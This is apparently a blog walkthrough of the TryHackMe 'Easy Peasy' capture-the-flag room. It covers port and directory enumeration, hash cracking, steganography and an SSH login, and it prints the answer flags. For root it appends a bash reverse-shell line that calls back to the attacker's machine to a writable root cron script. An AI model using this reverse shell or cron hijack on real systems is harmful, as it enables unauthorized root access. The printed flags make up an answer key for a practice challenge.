TryHackMe | Easy Peasy

7 min readFeb 17, 2023

This is one (of many) walkthrough for the EasyPeasy CTF room. As always, I try to follow some simple enumeration steps to expose potential flaws from this article. As you will see, it was not so easy for me to solve this challenge 😅. I had to sweat a bit to accomplish the mission.

Enumeration through Nmap

This one seemed different from the others I’ve been doing so far. By doing a quick nmap command, it returned a couple of open ports, however, it was not enough to answer the question in hands.

┌──(root㉿kali)-[~]
└─$ nmap -sCV $IP-ADDRESS
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-10 15:21 UTC
Nmap scan report for ip-10-10-44-157.eu-west-1.compute.internal (10.10.44.157)
Host is up (0.0024s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp open  http    nginx 1.16.1
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: nginx/1.16.1
|_http-title: Welcome to nginx!
MAC Address: 02:00:81:F5:B8:01 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.56 seconds

With that in mind, I tried a more comprehensive command that would include a (way) bigger range of ports. This one took a long while to finish…

┌──(root㉿kali)-[~]
└─$ nmap -p- $IP-ADDRESS

After the command was finished, I gathered more information about the ports through a more sophisticated nmap command:

┌──(root㉿kali)-[~]
└─$ nmap -sCV -p80,6498,65524 $IP-ADDRESS

How many ports are open? 3
What is the version of nginx? 1.16.1
What is running on the highest port? Apache

Compromising the machine

With no more information available, I relied on gobuster to retrieve more useful information to solve the next questions.

┌──(root㉿kali)-[~]
└─$ gobuster dir -u http://$IP-ADDRESS -x html,txt,php,js,py -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://$IP-ADDRESS
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,txt,php,js,py
[+] Timeout:        10s
===============================================================
2023/02/17 18:29:09 Starting gobuster
===============================================================
/hidden (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
===============================================================
2023/02/17 18:29:12 Finished
===============================================================
===============================================================

I used gobuster continuously from all the supposedly hidden directories (hidden → whatever) until I found a md5 hash in the HTML source code. Using cyberchef I quickly found the first flag of the CTF.

4. Using GoBuster, find flag 1: flag{f1rs7_fl4g}

Just in case, I enumerated the path where I have found the flag. 🤓 Nothing came out. From this point, I couldn’t carry on with the main web server. There was a missing web server to enumerate.

┌──(root㉿kali)-[~]
└─$ gobuster dir -u http://$IP-ADDRESS:65524 -x html,txt,php,js,py -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://$IP-ADDRESS:65524
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php,js,py,html
[+] Timeout:        10s
===============================================================
2023/02/17 18:40:33 Starting gobuster
===============================================================
...
/index.html (Status: 200)
/index.html (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2023/02/17 18:40:36 Finished
===============================================================

Even though the other service had a robots.txt available (with no information), this one was different. It contained something that would be useful.

At first, tried to perform a curl with this custom User-Agent but without any success. The HTML source code was exactly the same as the original one (you can use diffchecker to compare results).

The second flag was a bit difficult, mostly perhaps due to the lack of knowledge (and creativity). I quickly run john to assess the hash. It seemed a md5 hash based on the output. I accessed crackstation to see if their database already cracked the hash in the past. No luck here 🤔. Last, but not least, I tried md5hashing and I got lucky 🎉. Suggestions are welcome here! Perhaps, next time I can get more creative while cracking hashes. Lesson learned: Try different online cracking tools as they have different databases. One of them might have what you are looking for.

5. Further enumerate the machine, what is flag 2? flag{1m_s3c0nd_fl4g}

From the main page in port 65524, there was a “Fl4g 3” reference with the actual flag.

6. Crack the hash with easypeasy.txt, What is the flag 3? flag{9fdafbd64c47471a8f54cd3fc64cd312}

By inspecting the same page HTML source code I’ve found some hidden text that suggested the usage of a baseXX decoding algorithm. After several tries with base[32,45,58,62] I found something that looked like a path. Blame me for using brute-force in the different base algorithms 😙

7. What is the hidden directory? /n0th1ng3ls3m4tt3r

Suddenly, I entered matrix 😎! Same thing, different page here. I checked the source code and got another hash to crack. John to the rescue!

┌──(root㉿kali)-[~]

$ echo "$MY-HASH" > hash
$ john hash --wordlist=$downloaded-task-file-password.dic
Warning: detected hash type "gost", but the string is also recognized as "HAVAL-256-3"
Use the "--format=HAVAL-256-3" option to force loading these as that type instead
Warning: detected hash type "gost", but the string is also recognized as "Panama"
...
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mypasswordforthatjob (?)
1g 0:00:00:00 DONE (2023-02-17 19:20) 50.00g/s 204800p/s 204800c/s 204800C/s mypasswordforthatjob..flash88
Use the "--show" option to display all of the cracked passwords reliably

8. Using the wordlist that provided to you in this task crack the hash
what is the password? mypasswordforthatjob

Finding the SSH password was something tricky to determine. At this point, I didn’t have any information available. I tried several things in order to achieve the final result.

Use exploit-db to find any exploit for the version of SSH

From the version of ssh, I actually found an exploit for it. However, it didn’t take me anywhere. Besides having to fix some issues with the exploit (missing print syntax and some paramiko issues), the enumeration of users didn’t help to proceed with the resolution of the CTF.

GitHub - sriramoffcl/OpenSSH-7.6p1-Exploit-py-

You can't perform that action at this time. You signed in with another tab or window. You signed out in another tab or…

github.com

Explore vulnerabilities on the ssh version

┌──(root㉿kali)-[~]

$ nmap --script=ssh-* -p6498 $IP-ADDRESS
# nothign really interesting happening here

Nothing here as well….

Use cyberchef to convert binary value

It was a bit silly, but I tried anyway. There were some highlighted binary code in the image. I used cyberchef to convert into a human-readable result. Also, nothing really interesting here.

Explore hidden information in images

After downloaded the image on this weird path, I used steghide to extract hidden information. For the passphrase I used the one extracted previously.

┌──(root㉿kali)-[~]

$ steghide --extract -sf index.jpeg 
Enter passphrase: $PASSWORD-EXTRACTED-BEFORE
wrote extracted data to "secrettext.txt".

Hmmmm, interesting, a username and a password (for SSH?). Quickly went to cyberchef and retrieve the password.

9. What is the password to login to the machine via SSH? iconvertedmypasswordtobinary

After connecting through, ssh, I got a pretty dangerous message 👮

┌──(root㉿kali)-[~]

$ ssh boring@$IP-ADDRESS -p 6498

*************************************************************************
**        This connection are monitored by government offical          **
**            Please disconnect if you are not authorized        **
** A lawsuit will be filed against you if the law is not followed      **
*************************************************************************
boring@10.10.102.202's password: 
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!
You Have 1 Minute Before AC-130 Starts Firing
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
!!!!!!!!!!!!!!!!!!I WARN YOU !!!!!!!!!!!!!!!!!!!!

User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}
boring@kral4-PC:~$ exit
logout

Let’s be quick on this one! From the main directory I checked the contents of the user.txt. However, they got a pretty interesting suggestion. It stated that the flag was rotated (or something).

From “rotated” I quickly remember the caesar-cipher from previous learnings (thanks again THM).

10. What is the user flag? flag{n0wits33msn0rm4l}

Last, but not least, there was a root flag missing. From last CTF made, one of the things that I check is the file containing all the cron jobs. This file is located in /etc/crontab

┌──(root㉿kali)-[~]

$ ssh boring@$IP-ADDRESS -p 6498

...
$ cat /etc/crontab
# m h dom mon dow user command
17 * * * * root    cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh

I quickly checked the permissions of this “secret cron job” and noticed that the boring user could modify it. From gtfo, I found a reverse shell for bash. Feel free to use a different approach.

┌──(root㉿kali)-[~]

# FROM THE SSH SERVER
$ cd /var/www && echo "bash -c 'exec bash -i &>/dev/tcp/$MY-VM-IP-ADDRESS/4444 <&1'" >> .mysecretcronjob.sh

Finally, all you need is to start nc and wait for a shell to be spawned.

┌──(root㉿kali)-[~]

# FROM THE ATTACK BOX
$ nc -lvnp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from $IP 51612 received!
bash: cannot set terminal process group (4279): Inappropriate ioctl for device
bash: no job control in this shell
root@kral4-PC:/var/www# whoami
whoami
root

root@kral4-PC:/var/www# cd roo 
cd roo
bash: cd: roo: No such file or directory
root@kral4-PC:/var/www# cd root
cd root
bash: cd: root: No such file or directory
root@kral4-PC:/var/www# ls
ls
html
root@kral4-PC:/var/www# cd /root
cd /root
root@kral4-PC:~# ls -la
ls -la
total 40
...
-rw-r--r--  1 root root   39 Jun 15  2020 .root.txt
root@kral4-PC:~# cat .root.txt
cat .root.txt
# VOILA!

11. What is the root flag? flag{63a9f0ea7bb98050796b649e85481845}

Conclusion

This CTF was not so easy as the name suggested. I struggled to find the answers to some exercises. Some extra research was necessary in order to take full advantage of the tools. Kudos to kral4 to create this one! 👍